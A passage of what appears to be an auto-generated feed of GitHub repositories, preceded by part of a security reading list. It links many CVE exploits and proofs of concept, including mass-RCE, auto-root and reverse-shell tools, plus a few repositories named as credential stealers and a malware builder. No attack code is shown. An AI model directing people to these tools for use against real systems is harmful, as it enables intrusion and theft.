Hackers Handbook by Wade Alcorn et al., 2014](http://amzn.to/2jl9asy) * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://amzn.to/2jMmtz1) * [Car Hacker's Handbook by Craig Smith, 2016](http://amzn.to/2jldxnL) #### Defensive Development * [Holistic Info-Sec for Web Developers (Fascicle 0)](http://amzn.to/2jmRqwB) * [Holistic Info-Sec for Web Developers (Fascicle 1)](https://leanpub.com/holistic-infosec-for-web-developers-fascicle1-vps-network-cloud-webapplications) #### Network Analysis Books * [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](http://amzn.to/2izkmAN) * [Practical Packet Analysis by Chris Sanders, 2011](http://amzn.to/2jn091H) * [Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012](http://amzn.to/2jn4DFU) * [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](http://amzn.to/2izaCXe) #### Reverse Engineering Books * [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/) * [Hacking the Xbox by Andrew Huang, 2003](http://amzn.to/2iudEbO) * [The IDA Pro Book by Chris Eagle, 2011](http://amzn.to/2itYfbI) * [Practical Reverse Engineering by Bruce Dang et al., 2014](http://amzn.to/2jMnAyD) * [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://amzn.to/2iua6q7) #### Malware Analysis Books * [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](http://amzn.to/2izon8f) * [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](http://amzn.to/2iuh1j8) * [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](http://amzn.to/2jnag6W) #### Windows Books * [Windows Internals by Mark Russinovich et al., 2012](http://amzn.to/2jl4zGJ) #### Social Engineering Books * [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://amzn.to/2jMhgXQ) * [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://amzn.to/2jl287p) * [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://amzn.to/2izbuuV) * [No Tech Hacking by Johnny Long & Jack Wiles, 2008](http://amzn.to/2iudb9G) * [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](http://amzn.to/2iu62WZ) * [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://amzn.to/2izf4W5) * [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](http://amzn.to/2izlww9) #### Lock Picking Books * [Practical Lock Picking by Deviant Ollam, 2012](http://amzn.to/2jmQeJy) * [Keys to the Kingdom by Deviant Ollam, 2012](http://amzn.to/2izcvDg) * [CIA Lock Picking Field Operative Training Manual](http://amzn.to/2jMrw2c) * [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0) * [Eddie the Wire books](https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0) ### Vulnerability Databases * [NVD](https://nvd.nist.gov/) - US National Vulnerability Database * [CERT](https://www.us-cert.gov/) - US Computer Emergency Readiness Team * [OSVDB](https://blog.osvdb.org/) - Open Sourced Vulnerability Database * [Bugtraq](http://www.securityfocus.com/) - Symantec SecurityFocus * [Exploit-DB](https://www.exploit-db.com/) - Offensive Security Exploit Database * [Fulldisclosure](http://seclists.org/fulldisclosure/) - Full Disclosure Mailing List * [MS Bulletin](https://technet.microsoft.com/en-us/security/bulletins) - Microsoft Security Bulletin * [MS Advisory](https://technet.microsoft.com/en-us/security/advisories) - Microsoft Security Advisories * [Inj3ct0r](http://www.1337day.com/) - Inj3ct0r Exploit Database * [Packet Storm](https://packetstormsecurity.com/) - Packet Storm Global Security Resource * [SecuriTeam](http://www.securiteam.com/) - Securiteam Vulnerability Information * [CXSecurity](http://cxsecurity.com/) - CSSecurity Bugtraq List * [Vulnerability Laboratory](http://www.vulnerability-lab.com/) - Vulnerability Research Laboratory * [ZDI](http://www.zerodayinitiative.com/) - Zero Day Initiative * [Vulners](https://vulners.com) - Security database of software vulnerabilities ### Security Courses * [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers * [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification * [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes * [CTF Field Guide](https://trailofbits.github.io/ctf/) - everything you need to win your next CTF competition * [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare. * [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Enviroments'. * [Computer Security Student](http://computersecuritystudent.com) - Many free tutorials, great for beginners, $10/mo membership unlocks all content * [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material ### Information Security Conferences * [DEF CON](https://www.defcon.org/) - An annual hacker convention in Las Vegas * [Black Hat](http://www.blackhat.com/) - An annual security conference in Las Vegas * [BSides](http://www.securitybsides.com/) - A framework for organising and holding security conferences * [CCC](https://events.ccc.de/congress/) - An annual meeting of the international hacker scene in Germany * [DerbyCon](https://www.derbycon.com/) - An annual hacker conference based in Louisville * [PhreakNIC](http://phreaknic.info/) - A technology conference held annually in middle Tennessee * [ShmooCon](http://shmoocon.org/) - An annual US east coast hacker convention * [CarolinaCon](http://www.carolinacon.org/) - An infosec conference, held annually in North Carolina * [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con * [SummerCon](http://www.summercon.org/) - One of the oldest hacker conventions, held during Summer * [Hack.lu](https://2016.hack.lu/) - An annual conference held in Luxembourg * [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands * [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany * [Hack3rCon](http://hack3rcon.org/) - An annual US hacker conference * [ThotCon](http://thotcon.org/) - An annual US hacker conference held in Chicago * [LayerOne](http://www.layerone.org/) - An annual US security conference held every spring in Los Angeles * [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria * [SkyDogCon](http://www.skydogcon.com/) - A technology conference in Nashville * [SECUINSIDE](http://secuinside.com) - Security Conference in [Seoul](https://en.wikipedia.org/wiki/Seoul) * [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania * [AppSecUSA](https://appsecusa.org/) - An annual conference organised by OWASP * [BruCON](http://brucon.org) - An annual security conference in Belgium * [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK * [Nullcon](http://nullcon.net/website/) - An annual conference in Delhi and Goa, India * [RSA Conference USA](https://www.rsaconference.com/) - An annual security conference in San Francisco, California, USA * [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - An annual security conference in Lucerne, Switzerland * [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - An annual conference going to be held in Denver, USA for 2016 * [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina * [44Con](https://44con.com/) - Annual Security Conference held in London * [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annualy held in Novi Sad, Serbia * [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia ### Information Security Magazines * [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - An American publication about technology and computer "underground" * [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine Please have a look at * [Top Hacking Books](http://www.kalitut.com/2016/12/best-ethical-hacking-books.html) * [Top Reverse Engineering Books](http://www.kalitut.com/2017/01/Best-reverse-engineering-books.html) * [Top Machine learning Books](http://www.kalitut.com/2017/01/machine-learning-book.html) * [Top 5 books Programming Books](http://www.kalitut.com/2017/01/Top-Programming-Books.html) * [Top Java Books](http://www.kalitut.com/2017/01/Best-Java-Programming-Books.html)** : [sidd3009/PenTesting](https://github.com/sidd3009/PenTesting) create time: 2022-08-15T13:40:44Z

**A tool for extracting, modifying, and crafting ASDM binary packages (CVE-2022-20829)** : [jbaines-r7/theway](https://github.com/jbaines-r7/theway) create time: 2022-04-28T17:04:58Z

**metasploit and python module for CVE-2022-26809 windows rpc rce via smb 445** : [Ziggy78/CVE-2022-26809-MASS-RCE](https://github.com/Ziggy78/CVE-2022-26809-MASS-RCE) create time: 2022-08-15T12:06:18Z

**https://nvd.nist.gov/vuln/detail/CVE-2022-34169** : [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169) create time: 2022-08-15T09:43:08Z

**CVE-2022-24500 Windows SMB Unauthenticated Remote Code Execution Vulnerability** : [Daro1967/CVE-2022-24500-MASS-RCE](https://github.com/Daro1967/CVE-2022-24500-MASS-RCE) create time: 2022-08-15T07:52:50Z

**CVE-2010-3333复现** : [Sunqiz/CVE-2010-3333-reproduction](https://github.com/Sunqiz/CVE-2010-3333-reproduction) create time: 2022-08-15T06:54:55Z

**CVE-2011-0104复现** : [Sunqiz/CVE-2011-0104-reproduction](https://github.com/Sunqiz/CVE-2011-0104-reproduction) create time: 2022-08-15T07:04:20Z

**CVE-2012-0158复现** : [Sunqiz/CVE-2012-0158-reproduction](https://github.com/Sunqiz/CVE-2012-0158-reproduction) create time: 2022-08-15T06:59:06Z

**CVE-2013-2028复现** : [Sunqiz/CVE-2013-2028-reproduction](https://github.com/Sunqiz/CVE-2013-2028-reproduction) create time: 2022-08-15T07:06:23Z

**CVE-2017-0199复现** : [Sunqiz/CVE-2017-0199-reprofuction](https://github.com/Sunqiz/CVE-2017-0199-reprofuction) create time: 2022-08-15T07:15:55Z

**CVE-2017-11882复现** : [Sunqiz/CVE-2017-11882-reproduction](https://github.com/Sunqiz/CVE-2017-11882-reproduction) create time: 2022-08-15T07:09:23Z

**🕵️ Yet another CVE-2019-9670 exploit, but in Golang.** : [oppsec/zaber](https://github.com/oppsec/zaber) create time: 2022-08-15T00:54:44Z

**no description** : [MeDx64/CVE-2022-27925](https://github.com/MeDx64/CVE-2022-27925) create time: 2022-08-14T22:22:55Z

**no description** : [MeDx64/CVE-2022-27925](https://github.com/MeDx64/CVE-2022-27925) create time: 2022-08-14T22:20:25Z

**no description** : [Geni0r/cve-2021-4034-poc](https://github.com/Geni0r/cve-2021-4034-poc) create time: 2022-08-14T16:07:29Z

**Nortek Control Linear eMerge E3-Series 信息泄露** : [Henry4E36/CVE-2022-31269](https://github.com/Henry4E36/CVE-2022-31269) create time: 2022-08-14T16:23:54Z

**Trying to reproduce CVE-2021-43908** : [Sudistark/vscode-rce-electrovolt](https://github.com/Sudistark/vscode-rce-electrovolt) create time: 2022-08-12T05:18:43Z

**CVE-2022-33891 Exploit For Apache Spark** : [DrLinuxOfficial/CVE-2022-33891](https://github.com/DrLinuxOfficial/CVE-2022-33891) create time: 2022-08-13T23:02:56Z

**Modified dirtypipe script into auto root without have to search a file manually to hijack suid binary.** : [EagleTube/CVE-2022-0847](https://github.com/EagleTube/CVE-2022-0847) create time: 2022-08-13T16:58:40Z

**Autopwn Log4Shell (CVE-2021-44228)!!!** : [nemesi-ita/autoL4s](https://github.com/nemesi-ita/autoL4s) create time: 2022-08-13T15:42:27Z

**the payload of CVE-2021-21300** : [Roboterh/CVE-2021-21300](https://github.com/Roboterh/CVE-2021-21300) create time: 2022-08-13T13:00:58Z

**Zimbra RCE simple poc** : [vnhacker1337/CVE-2022-27925-PoC](https://github.com/vnhacker1337/CVE-2022-27925-PoC) create time: 2022-08-12T18:35:52Z

**CVE-2022-35513 | blink1-pass-decrypt** : [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513) create time: 2022-07-05T18:27:36Z

**GOG Galaxy LPE Exploit** : [secure-77/CVE-2022-31262](https://github.com/secure-77/CVE-2022-31262) create time: 2022-08-11T19:33:02Z

**PoC for CVE-2022-24654** : [leonardobg/CVE-2022-24654](https://github.com/leonardobg/CVE-2022-24654) create time: 2022-08-11T15:06:49Z

**no description** : [Silencecyber/cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034) create time: 2022-08-11T14:10:39Z

**A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997.** : [p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE) create time: 2022-08-11T11:47:17Z

**CVE-2021-4154 exploit** : [Markakd/CVE-2021-4154](https://github.com/Markakd/CVE-2021-4154) create time: 2022-08-11T05:46:27Z

**exploit for CVE-2022-2588** : [Markakd/CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588) create time: 2022-08-11T06:01:24Z

**Similarity Measure percentage calculation between CVE (2021,2022) and USA Jobs (Cybersecurity job description), Indeed (Cybersecurity job description), LinkedIn (Historically marginalized Populations from Non MSA Data Description)** : [team-v-2022/Cosine-Percentage-Calculation](https://github.com/team-v-2022/Cosine-Percentage-Calculation) create time: 2022-08-11T00:54:32Z

**no description** : [J0EP/CVE-2022-X](https://github.com/J0EP/CVE-2022-X) create time: 2022-08-10T19:12:06Z

**An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.** : [Exploitables/CVE-2021-44852](https://github.com/Exploitables/CVE-2021-44852) create time: 2022-08-10T15:53:44Z

**baton drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability** : [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894) create time: 2022-08-09T15:53:48Z

**RSA Key Checker for CVE-2022-20866** : [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866) create time: 2022-07-13T12:48:49Z

**This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication** : [APTIRAN/CVE-2022-1040](https://github.com/APTIRAN/CVE-2022-1040) create time: 2022-08-10T10:38:59Z

**CVE** : [HKirito/CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980) create time: 2022-08-10T03:21:19Z

**no description** : [markisback/CVE-2018-6574](https://github.com/markisback/CVE-2018-6574) create time: 2022-08-09T23:45:13Z

**Exploit PoC for CVE-2022-29968 by Joseph Ravichandran and Michael Wang** : [jprx/CVE-2022-29968](https://github.com/jprx/CVE-2022-29968) create time: 2022-04-19T19:38:25Z

**no description** : [0xNix/CVE-2021-4034](https://github.com/0xNix/CVE-2021-4034) create time: 2022-08-09T17:54:27Z

**POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox** : [theabysslabs/CVE-2022-21881](https://github.com/theabysslabs/CVE-2022-21881) create time: 2022-08-09T14:16:40Z

**Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)** : [karthikuj/CVE-2022-31101](https://github.com/karthikuj/CVE-2022-31101) create time: 2022-08-09T10:29:48Z

**no description** : [poxicity/CVE-2015-1328](https://github.com/poxicity/CVE-2015-1328) create time: 2022-08-09T04:10:28Z

**no description** : [poxicity/CVE-2015-1328](https://github.com/poxicity/CVE-2015-1328) create time: 2022-08-09T03:54:03Z

**Webkit (Safari) - Exploit** : [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620) create time: 2022-08-04T07:11:39Z

**no description** : [vesperp/CVE-2021-20038-SonicWall-RCE](https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE) create time: 2022-08-08T03:38:06Z

**PoC for GLPI CVE-2022-31061** : [Vu0r1/CVE-2022-31061](https://github.com/Vu0r1/CVE-2022-31061) create time: 2022-08-07T18:14:54Z

**SambaCry exploit (CVE-2017-7494)** : [00mjk/exploit-CVE-2017-7494](https://github.com/00mjk/exploit-CVE-2017-7494) create time: 2022-05-29T16:27:13Z

**CVE-2007-2447 exploit written in python to get reverse shell** : [HerculesRD/PyUsernameMapScriptRCE](https://github.com/HerculesRD/PyUsernameMapScriptRCE) create time: 2022-08-07T00:34:38Z

**CallStranger (CVE-2020-12695) vulnerability.** : [Xcod3bughunt3r/CallStranger](https://github.com/Xcod3bughunt3r/CallStranger) create time: 2022-08-06T14:12:23Z

**CVE-2022-1015** : [pr0ln/bob_kern_exp1](https://github.com/pr0ln/bob_kern_exp1) create time: 2022-08-06T12:34:22Z

**CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15** : [zxj-52031/mai-lang-chain](https://github.com/zxj-52031/mai-lang-chain) create time: 2022-08-06T06:55:15Z

**Exploit for CVE-2022-29582 targeting Google's Kernel CTF** : [Ruia-ruia/CVE-2022-29582-Exploit](https://github.com/Ruia-ruia/CVE-2022-29582-Exploit) create time: 2022-08-04T15:29:04Z

**no description** : [Satheesh575555/Openssl_1_1_0_CVE-2021-23841](https://github.com/Satheesh575555/Openssl_1_1_0_CVE-2021-23841) create time: 2022-08-05T10:52:16Z

**PHPMailer < 5.2.18 Remote Code Execution** : [zeeshanbhattined/exploit-CVE-2016-10033](https://github.com/zeeshanbhattined/exploit-CVE-2016-10033) create time: 2022-08-05T08:24:14Z

**Vulnerability in Crow prior v1.0+4** : [0xhebi/CVE-2022-34970](https://github.com/0xhebi/CVE-2022-34970) create time: 2022-07-29T00:19:33Z

**A Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.** : [jeffymcjeffface/five-nights-at-follina-s](https://github.com/jeffymcjeffface/five-nights-at-follina-s) create time: 2022-08-01T16:47:50Z

**CVE-2021-41773 Gaurav Raj's exploit modified by Plunder** : [Plunder283/CVE-2021-41773](https://github.com/Plunder283/CVE-2021-41773) create time: 2022-08-04T16:19:42Z

**no description** : [0x414141414/Silent-Word-Exploit-CVE-2022](https://github.com/0x414141414/Silent-Word-Exploit-CVE-2022) create time: 2022-08-04T13:51:17Z

**海康威视RCE漏洞 批量检测和利用工具** : [Cuerz/CVE-2021-36260](https://github.com/Cuerz/CVE-2021-36260) create time: 2022-08-03T17:27:59Z

**Exploit to capitalize on vulnerability CVE-2020-2038.** : [und3sc0n0c1d0/CVE-2020-2038](https://github.com/und3sc0n0c1d0/CVE-2020-2038) create time: 2022-08-03T17:21:51Z

**no description** : [timb-machine-mirrors/cve-2021-3060.py](https://github.com/timb-machine-mirrors/cve-2021-3060.py) create time: 2022-08-03T17:14:13Z

**no description** : [aweiiy/CVE-2021-43617](https://github.com/aweiiy/CVE-2021-43617) create time: 2022-08-03T10:18:44Z

**no description** : [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947) create time: 2022-08-03T02:51:26Z

**no description** : [ro-fes/CVE2019-10092](https://github.com/ro-fes/CVE2019-10092) create time: 2022-08-02T20:14:54Z

**no description** : [Reysbumb/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/Reysbumb/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-08-02T19:57:34Z

**no description** : [Reysbumb/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Reysbumb/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-08-02T19:48:05Z

**no description** : [Reysbumb/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Reysbumb/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-08-02T19:47:19Z

**CVE-2022-36946 linux kernel panic in netfilter_queue** : [XmasSnowISBACK/CVE-2022-36946](https://github.com/XmasSnowISBACK/CVE-2022-36946) create time: 2022-08-02T18:57:19Z

**COMPILED** : [XmasSnowISBACK/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/XmasSnowISBACK/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-08-02T18:53:26Z

**CVE-2022-21661 exp for Elementor custom skin.** : [XmasSnowISBACK/CVE-2022-21661](https://github.com/XmasSnowISBACK/CVE-2022-21661) create time: 2022-08-02T18:51:31Z

**CVE-2022-33891 - Apache Spark Command Injection** : [XmasSnowISBACK/CVE-2022-33891](https://github.com/XmasSnowISBACK/CVE-2022-33891) create time: 2022-08-02T18:41:39Z

**This paper is about manual exploitation of android open port vulnerability found in ES file manager. This open TCP 59777 port allows the attacker to install a backdoor and gather all the user’s data. Further in this paper there will be a proof of concept presented to consolidate the vulnerability. Download the PDF and enjoy !!! Cheers !!!** : [vino-theva/CVE-2019-6447](https://github.com/vino-theva/CVE-2019-6447) create time: 2022-08-02T17:16:34Z

**Apache Log4j is a logging tool written in Java. This paper focuses on what is Log4j and log4shell vulnerability and how it works, how it affects the victim, and how can this be mitigated** : [vino-theva/CVE-2021-44228](https://github.com/vino-theva/CVE-2021-44228) create time: 2022-08-02T17:03:55Z

**建立一個概念類似 CVE-2022-28219 的測試環境** : [aeifkz/CVE-2022-28219-Like](https://github.com/aeifkz/CVE-2022-28219-Like) create time: 2022-07-27T09:03:10Z

**no description** : [guialvesf/CVE-2018-6574](https://github.com/guialvesf/CVE-2018-6574) create time: 2022-08-02T13:21:20Z

**no description** : [veritas501/CVE-2022-34918](https://github.com/veritas501/CVE-2022-34918) create time: 2022-08-02T09:52:02Z

**COMPILED** : [eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-08-01T14:14:40Z

**no description** : [Blackyguy/-CVE-2022-29464](https://github.com/Blackyguy/-CVE-2022-29464) create time: 2022-08-01T07:27:29Z

**no description** : [xpgdgit/CVE-2015-5531](https://github.com/xpgdgit/CVE-2015-5531) create time: 2022-08-01T07:21:43Z

**no description** : [xpgdgit/CVE-2014-3120](https://github.com/xpgdgit/CVE-2014-3120) create time: 2022-08-01T04:39:04Z

**Analaysis of cve-2016-0728** : [tndud042713/cve-2016-0728](https://github.com/tndud042713/cve-2016-0728) create time: 2022-07-31T18:51:15Z

**PoC exploit for CVE-2017-1000251 (modified)** : [istanescu/CVE-2017-1000251_Exploit](https://github.com/istanescu/CVE-2017-1000251_Exploit) create time: 2022-07-31T12:17:41Z

**CVE-2022-21661 exp for Elementor custom skin.** : [QWERTYisme/CVE-2022-21661](https://github.com/QWERTYisme/CVE-2022-21661) create time: 2022-07-31T11:53:06Z

**Exploit for SpringShell.** : [iyamrotrix/CVE-2022-22965](https://github.com/iyamrotrix/CVE-2022-22965) create time: 2022-07-31T08:21:59Z

**「💥」CVE-2022-33891 - Apache Spark Shell Command Injection** : [AmoloHT/CVE-2022-33891](https://github.com/AmoloHT/CVE-2022-33891) create time: 2022-07-30T23:02:16Z

**Script to exploit CVE-2018-1042 in order to do internal port scans.** : [UDPsycho/Moodle-CVE-2018-1042](https://github.com/UDPsycho/Moodle-CVE-2018-1042) create time: 2022-07-30T17:06:57Z

**CVE 2022.07.30** : [redclip44/CVE](https://github.com/redclip44/CVE) create time: 2022-07-30T17:20:08Z

**Script to exploit CVE-2018-1042 in order to do internal port scans.** : [UDPsycho/Moodle-CVE-2018-1042](https://github.com/UDPsycho/Moodle-CVE-2018-1042) create time: 2022-07-30T16:08:50Z

**Microsoft Exchange Server Spoofing Vulnerability Exploit!** : [0xrobiul/CVE-2021-41349-Exploit](https://github.com/0xrobiul/CVE-2021-41349-Exploit) create time: 2022-07-30T10:51:55Z

**Confluence CVE-2022-26138 POC** : [z92g/CVE-2022-26138](https://github.com/z92g/CVE-2022-26138) create time: 2022-07-30T07:14:52Z

**DistCC exploit** : [angelpimentell/distcc_cve_2004-2687_exploit](https://github.com/angelpimentell/distcc_cve_2004-2687_exploit) create time: 2022-03-15T18:25:27Z

**no description** : [Skipper7718/CVE-2022-21449-showcase](https://github.com/Skipper7718/CVE-2022-21449-showcase) create time: 2022-07-29T16:33:10Z

**no description** : [fazaroot/cve-2021-pwnkit](https://github.com/fazaroot/cve-2021-pwnkit) create time: 2022-07-29T13:12:36Z

**wo ee cve-2022-2185 gitlab authenticated rce** : [ESUAdmin/CVE-2022-2185](https://github.com/ESUAdmin/CVE-2022-2185) create time: 2022-07-29T11:14:03Z

**no description** : [xpgdgit/CVE-2015-1427](https://github.com/xpgdgit/CVE-2015-1427) create time: 2022-07-29T09:14:56Z

**WordPress Simple File List FileRead POC** : [z92g/CVE-2022-1119](https://github.com/z92g/CVE-2022-1119) create time: 2022-07-29T05:04:26Z

**libSSH-Authentication-Bypass** : [EmmanuelCruzL/CVE-2018-10933](https://github.com/EmmanuelCruzL/CVE-2018-10933) create time: 2022-07-28T13:49:47Z

**WordPress WP_Query SQL Injection POC** : [z92g/CVE-2022-21661](https://github.com/z92g/CVE-2022-21661) create time: 2022-07-28T13:12:51Z

**PHP CGI Argument Injection RCE** : [theykillmeslowly/CVE-2012-1823](https://github.com/theykillmeslowly/CVE-2012-1823) create time: 2022-07-28T11:51:03Z

**no description** : [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946) create time: 2022-07-28T11:22:13Z

**Atlassian Confluence Server and Data Center: CVE-2022-26138** : [Vulnmachines/Confluence-Question-CVE-2022-26138-](https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-) create time: 2022-07-28T09:48:21Z

**Apache 2.4.49-50 Remote Code Execution Exploit** : [khidhir-ibrahim/CVE-2021-42013](https://github.com/khidhir-ibrahim/CVE-2021-42013) create time: 2022-07-28T09:21:50Z

**Reports on post-exploitation on honeypot exploiting vulnerable wu-ftpd (CVE-2001-0550)** : [gilberto47831/Network-Filesystem-Forensics](https://github.com/gilberto47831/Network-Filesystem-Forensics) create time: 2022-07-28T04:52:58Z

**QNAP N-Day (Probably not CVE-2020-2509)** : [jbaines-r7/overkill](https://github.com/jbaines-r7/overkill) create time: 2022-07-27T19:58:40Z

**警惕 一种针对红队的新型溯源手段!** : [fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp](https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp) create time: 2022-07-27T15:48:19Z

**Java classpath enumeration, focussed on CVE-2014-0043 for Apache Wicket 6.x** : [JJK96/JavaClasspathEnum](https://github.com/JJK96/JavaClasspathEnum) create time: 2022-07-27T14:43:54Z

**CVE-2022-*** : [GREENHAT7/pxplan](https://github.com/GREENHAT7/pxplan) create time: 2021-11-22T12:57:22Z

**Vulnerability Polkit's pkexec** : [carloscast1llo/CVE-2021-4034](https://github.com/carloscast1llo/CVE-2021-4034) create time: 2022-07-27T10:15:37Z

**weblogic-cve-2018-2628-exp** : [cscadoge/weblogic-cve-2018-2628](https://github.com/cscadoge/weblogic-cve-2018-2628) create time: 2022-07-27T06:10:28Z

**Additional exploits for XSS in Cisco ASA devices discovered by PTSwarm** : [catatonicprime/CVE-2020-3580](https://github.com/catatonicprime/CVE-2020-3580) create time: 2022-07-15T00:11:29Z

**Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC.** : [aslitsecurity/Zimbra-CVE-2022-30333](https://github.com/aslitsecurity/Zimbra-CVE-2022-30333) create time: 2022-07-26T13:28:12Z

**no description** : [nidhi7598/openssl-OpenSSL_1_1_1g_AOSP_10_r33_CVE-2022-1292](https://github.com/nidhi7598/openssl-OpenSSL_1_1_1g_AOSP_10_r33_CVE-2022-1292) create time: 2022-07-26T11:33:10Z

**no description** : [yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL](https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL) create time: 2022-07-26T09:45:46Z

**A demo for cve-2019-12735** : [st9007a/CVE-2019-12735](https://github.com/st9007a/CVE-2019-12735) create time: 2022-07-26T08:45:21Z

**WebMin Versions <= 1.920 [CVE-2019-15107] RCE PoC** : [TheAlpha19/MiniExploit](https://github.com/TheAlpha19/MiniExploit) create time: 2022-07-26T07:38:03Z

**Module for PrestaShop 1.7.X to fix CVE-2022-31181 vulnerability (Chain SQL Injection)** : [drkbcn/lblfixer_cve_2022_31181](https://github.com/drkbcn/lblfixer_cve_2022_31181) create time: 2022-07-26T05:55:53Z

**CVE-2021-38647 is an unauthenticated RCE vulnerability effecting the OMI agent as root.** : [Vulnmachines/OMIGOD_cve-2021-38647](https://github.com/Vulnmachines/OMIGOD_cve-2021-38647) create time: 2021-09-24T10:53:52Z

**no description** : [ExploitCN/CVE-2018-11321](https://github.com/ExploitCN/CVE-2018-11321) create time: 2022-07-26T02:28:16Z

**no description** : [Walker-00/CVE-2021-22911](https://github.com/Walker-00/CVE-2021-22911) create time: 2022-07-25T12:36:30Z

**no description** : [nidhi7598/frameworks_av_AOSP_10_r33_CVE-2021-0520](https://github.com/nidhi7598/frameworks_av_AOSP_10_r33_CVE-2021-0520) create time: 2022-07-25T11:57:50Z

**no description** : [ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520) create time: 2022-07-25T11:51:11Z

**Unauthenticated RCE via CVE-2022-26138 confluence** : [Daro1967/CVE-2022-26138-RCE](https://github.com/Daro1967/CVE-2022-26138-RCE) create time: 2022-07-25T09:30:27Z

**no description** : [Ziggy78/CVE-2022-26809-RCE-POC](https://github.com/Ziggy78/CVE-2022-26809-RCE-POC) create time: 2022-07-25T08:58:46Z

**Joplin CVE-2022-35131, RCE** : [ly1g3/Joplin-CVE-2022-35131](https://github.com/ly1g3/Joplin-CVE-2022-35131) create time: 2022-07-25T06:25:52Z

